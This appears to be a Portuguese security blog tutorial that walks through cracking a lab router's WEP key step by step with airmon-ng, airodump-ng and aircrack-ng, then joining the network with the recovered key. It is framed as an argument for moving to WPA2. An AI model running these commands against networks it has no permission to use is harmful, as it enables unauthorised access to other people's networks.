InformationSecurityPro

Marcos Henrique

Information Security Pro

Revelar a chave WEP de um roteador Wireless é uma atividade simples de ser realizada, sabemos que há inúmeros roteadores de muitas empresas/residências com esta configuração, nosso papel como profissionais de segurança da informação é orientar para que seja realizada a alteração desta configuração para uma solução mais segura como WPA2 por exemplo.

Segue abaixo o passo a passo de como relevar uma chave WEP.

01 - Passo

Configurando o roteador Wireless.

Name (SSID): 100SECURITY
Channel: 6
Security: WEP (Wired Equivalent Privacy)
Passphrase: 123456
Key 1: AA8465E6A4

02 - Passo

Verificação da Interface wlan1.

ifconfig wlan1

03 - Passo

Listando todas as redes disponíveis.

iwlist scan

Resultado do Scan:

NMAC Address: 00:1F:33:22:5B:50
Channel: 6
ESSID:"100SECURITY"

04 - Passo

Iniciando o Modo Monitor do airmon-ng sobre a Interface wlan1.

airmon-ng start wlan1

Modo Monitor iniciado:

Observe que Modo Monitor da interface wlan1 foi habilitado para a interface mon0.

mon0 – Interface de rede que funciona de modo promíscuo.

05 - Passo

Utilizando o airodump-ng para capturar os dados.

airodump-ng –-ivs -w senha -c 6 mon0

airodump-ng : Programa utilizado para fazer o Dump dos pacotes.
–-ivs : Vetor de Inicialização.
-w : Define o prefixo do arquivo .ivs que será gerado ex.: ( senha-01.ivs ).
-c : Canal da Rede ex.: ( 6 ).
mon0 : Interface de rede que funciona de modo promíscuo.

06 - Passo

Monitorando a captura de dados.

Quando a coluna #Data ultrapassar 20.000 já se considera possível a quebra completa da chave.

No ex.: 21058 IVs foram capturados.

07 - Passo

Revelando a Chave WEP.

aircrack-ng -a 1 senha-01.ivs

aircrack-ng : Programa utilizado para quebra a senha dos IVs capturados
–a : Define o modo de ataque.
1 : Modo de ataque WEP.
senha-01.ivs : Arquivo gerado dos IVs capturados.

Chave Encontrada:

KEY FOUND! [ 0AA:84:65:E6:A4 ].
Chave: AA8465E6A4

08 - Passo

Editando e configurando o arquivo interfaces.

vim /etc/network/interfaces

auto wlan1
iface wlan1 inet dhcp
wireless-essid 100SECURITY
wireless-key AA8465E6A4

09 - Passo

Reiniciando as interfaces.

./etc/init.d/networking restart

Atribuição de IP via DHCP.
O IP 10.0.0.10 foi atribuído para a interface wlan1 através do roteador 10.0.0.1.

10 - Passo

Exibindo as definições da interface wlan1.

ESSID: "100SECURITY"
Encryption key: AA84-65E6-A4

iwconfig wlan1

👍 Se este artigo te ajudou compartilhe!

Autor

Marcos Henrique

São Paulo/SP

InformationSecurityPro

Information Security Pro

Revelando a Chave WEP

01 - Passo

02 - Passo

03 - Passo

04 - Passo

05 - Passo

06 - Passo

07 - Passo

08 - Passo

09 - Passo

10 - Passo

👍 Se este artigo te ajudou compartilhe!

Autor

Marcos Henrique

Ataques Wireless

Contato

RED TEAM

CVE

MICROSOFT

LINUX

OSINT

DESENVOLVIMENTO

INFRAESTRUTURA

DEEPWEB

BLUE TEAM

PURPLE TEAM

IA

DENUNCIE

Artigos

🤵 GESTÃO DE SI

🚀 Desafios

📚 Conhecimentos

📚 Interessantes

Information Security Pro

Revelando a Chave WEP

01 - Passo

02 - Passo

03 - Passo

04 - Passo

05 - Passo

06 - Passo

07 - Passo

08 - Passo

09 - Passo

10 - Passo

👍 Se este artigo te ajudou compartilhe!

Autor

Marcos Henrique

Ataques Wireless

Contato